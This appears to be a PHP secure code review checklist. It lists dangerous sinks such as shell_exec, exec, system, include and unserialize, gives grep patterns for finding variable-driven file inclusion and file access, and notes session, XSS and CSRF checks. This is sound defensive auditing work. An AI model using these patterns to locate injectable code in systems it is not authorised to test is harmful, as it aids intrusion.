- Command Injection, File Inclusion, Directory Traversal
Check use of:
-
shell_exec
-
exec
-
backtick (`)
-
system
-
include
-
include_once
-
require
-
require_once
-
file_get_contents
-
file_put_contents
-
fopen
-
preg_replace
-
Find everywhere
$_FILES
&$HTTP_POST_FILES
is referenced -
File extension filtering (http://blog.famillecollet.com/post/2013/01/13/PHP-and-Apache-SetHandler-vs-AddHandler)
find ./ -name "*php" -exec egrep -lE '(require|include)(_once)?(\s|\()+.*\$.*;$' {} \;
find ./ -name "*php" -exec egrep -lE 'file_get_contents(\s|\()+.*\$.*;$' {} \;
find ./ -name "*php" -exec egrep -lE 'file_put_contents(\s|\()+.*\$.*;$' {} \;
- Object injections
Check use of: serialize, unserialize
- SQL Injections
???
- Session Hijacking/Session fixation
- Review login and logout pages
- Setting session.cookie.httponly?
- XSS, Reflected XSS, CSRF
Check use of: $_REQUEST, $_POST, $_GET, $_SERVER, $_COOKIE